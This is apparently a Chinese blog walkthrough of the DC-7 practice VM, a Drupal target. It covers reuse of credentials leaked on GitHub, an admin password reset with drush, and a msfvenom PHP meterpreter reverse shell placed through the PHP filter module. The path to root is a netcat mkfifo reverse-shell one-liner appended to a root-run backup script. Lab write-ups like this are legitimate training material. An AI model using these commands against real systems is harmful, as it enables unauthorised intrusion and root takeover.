靶机渗透DC-7

001

早几天做到这题是不是360考核就能多对一道题了，菜是原罪······

CMS还是Drupal，msf几个模块都没成功，扫描后台也没扫描出什么有用的信息。应该还是在网站上。

002

终于找到不一样的地方了。

网上搜索一下，提示github上面有，然后在config.php里面看到了信息，

003

网站登陆但是失败，但是想起最开始扫描端口时候开了ssh，那就试试SSH登陆。

004

登陆上来了。看下mbox。

005

这里有个root权限执行的东西。

进入文件夹查看一下。

006

发现只有root或者www-data权限才可以执行.sh

看一下具体内容。

007

有个drush命令。查一下是什么东东。

008

和Drupal有关的，专门用来管理Drupal站点的Shell，可以用来修改密码。

drush user-password someuser --password="correct horse battery staple"

进入/var/www/html目录进行操作。

drush user-password admin --password="hack123"

009

然后去网站登陆。

010

成功登陆。

随便翻翻，只有Content模块可以写入自己的东西，不出意外这里就是突破点了。

011

没有PHP语言，网上查了下，可以手动下载。

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

012

如果下载显示连接失败的话可以下载到本地，再选择文件上传。

013

装好之后勾选PHP，然后下面install

014

015

有了PHP的选项。

然后就利用msf反弹Shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.154 LPORT=7777 -f raw

生成Shell代码，复制到网站上去。直接选择PHP类型，不然容易失败。

016

017

然后msf使用handler模块开启监听。

set payload php/meterpreter/reverse_tcp
set lhost 192.168.70.154
set lport 7777
run

然后点击Preview

018

成功进入meterpreter，信息收集下。

进入Shell模式，利用Python获得交互式Shell

python -c "import pty;pty.spawn('/bin/bash')"

019

接下来卡住了，翻目录也没什么有用的信息。不知道下一步该做什么了。

翻看前面，突然想到，刚才看到了backup.sh只有root权限才能使用，这里应该是突破点吧。

但是吧，还是不知道怎么破，菜是原罪······

看了师傅的笔记，跟着师傅的思路走一下。

方向确实没错，是利用这个backups.sh

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.70.154 4444 >/tmp/f" >> backups.sh

将反弹shell的代码附加到backups.sh脚本中

执行这条语句反弹回一个监听Shell

020

提权为root了！直接找flag即可。

021